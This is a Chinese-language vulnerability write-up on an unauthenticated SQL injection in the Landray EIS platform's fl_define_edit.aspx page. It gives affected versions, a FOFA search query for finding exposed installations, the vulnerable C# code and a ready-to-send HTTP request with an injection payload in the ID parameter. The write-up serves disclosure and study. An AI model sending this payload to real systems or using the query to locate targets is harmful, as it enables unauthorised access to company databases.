蓝凌智慧协同平台 fl_define_edit.aspx SQL注入漏洞


简介

蓝凌EIS智慧协同平台是一款专为成长型企业打造的智慧办公云平台,深度融合了阿里钉钉的功能。该平台旨在通过增强组织的协同在线、业务在线和生态在线,提升企业的工作效率和管理便捷性。 蓝凌EIS智慧协同平台 fl_define_edit.aspx存在SQL注入漏洞,未授权攻击者可利用该漏洞获取数据库敏感数据。

影响版本

Landray EIS 2001年至2006年的版本

fofa语法

body="/Scripts/jquery.landray.dialog.js" || icon_hash="953405444"

漏洞分析

关键代码如下

protected override void Page_Load(object sender, EventArgs e)
    {
      string str1 = this.Request["ID"] == null ? "0" : this.Request["ID"];
      string str2 = this.Request.QueryString["assign_recordid"] == null ? "" : this.Request.QueryString["assign_recordid"];
      Org org = (Org) ((Control) this).Page.Session["Org"];
      this.FIOA_IMG_FOLDER = this.Request.Cookies["FIOA_IMG_FOLDER"].Value;
      this.Tree1.ConfigFile = "conf/fl_define_menu_tree_property.xml";
      this.Tree1.XMLDataFile = org["flowchar"].Equals((object) "SVG流程图") ? "conf/fl_define_menu_tree_svg.xml" : "conf/fl_define_menu_tree_data.xml";
      this.Tree1.PrmData = str1 + (string.op_Equality(str2, "") ? "" : "&assign_recordid=" + str2);
      ((Control) this.Tree1).DataBind();
      if (!string.op_Inequality(str1, "0"))
        return;
      object obj = (object) Landray.DataAccess.DataAccess.GetOneValue("SELECT name FROM OA_FLOW_DEFINE WHERE ID=" + str1).ToString();
      this.form_type = Landray.DataAccess.DataAccess.GetOneValue("SELECT form_type FROM OA_FLOW_DEFINE WHERE ID=" + str1).ToString();
    }

直接将 ID ==> str1 拼接进sql语句,造成sql注入漏洞。

漏洞复现

GET /flow/fl_define_edit.aspx?ID=1%20and%201<CHAR(98)%2BCHAR(99)-- HTTP/1.1
Host: landray.mrxn.net


手机扫码阅读

泛微OA ReceiveTodoRequestByXml XML实体注入漏洞

万户OA getNextAutoCode.jsp SQL注入漏洞

评 论